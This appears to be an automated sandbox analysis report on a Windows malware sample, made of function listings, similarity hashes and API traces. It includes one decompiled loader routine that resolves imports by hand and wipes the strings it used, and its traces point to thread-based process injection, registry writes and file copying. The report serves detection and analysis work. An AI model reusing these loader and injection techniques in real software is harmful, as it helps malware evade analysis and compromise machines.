Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetCurrentThreadId.KERNEL32(?,00001000,00001000,?), ref: 001CDDC8
  • GetCurrentThread.KERNEL32 ref: 001CDDDB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CDE7E
  • Sleep.KERNEL32(0000000A), ref: 001CDE88
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CDEAE
    • Part of subcall function 001CDCA5: NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
    • Part of subcall function 001CDCA5: RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
    • Part of subcall function 001CDCA5: HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9D54, Relevance: 10.6, APIs: 7, Instructions: 144 Total matches: 54memoryregistry
Similarity
  • Total matches: 54
  • API ID: HeapFree$RegCloseKeyRegCreateKey
  • String ID:
  • API String ID: 3276616890-0
  • Opcode ID: b82f1d124a686c0fba74e06d606f12bbe42e9b5bf24afcb4d9ffa1ad41822641
  • Instruction ID: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
  • Opcode Fuzzy Hash: 4A118C6A048DC253C06778C5B1BB7F5C412BB82CD0C4D1363FEA46D65C6E8372D66B02
  • Instruction Fuzzy Hash: c57badf541bd68534790deaa67724b48a31e467339e930acdbfe2d3de4c2c09d
APIs
  • RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
  • HeapFree.KERNEL32(00000000,?), ref: 001C9E08
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9692, Relevance: 10.6, APIs: 7, Instructions: 138 Total matches: 53string
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C9BEF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125 Total matches: 48memory
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDB50, Relevance: 10.6, APIs: 7, Instructions: 122 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB703, Relevance: 10.6, APIs: 7, Instructions: 112 Total matches: 56synchronizationthread
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
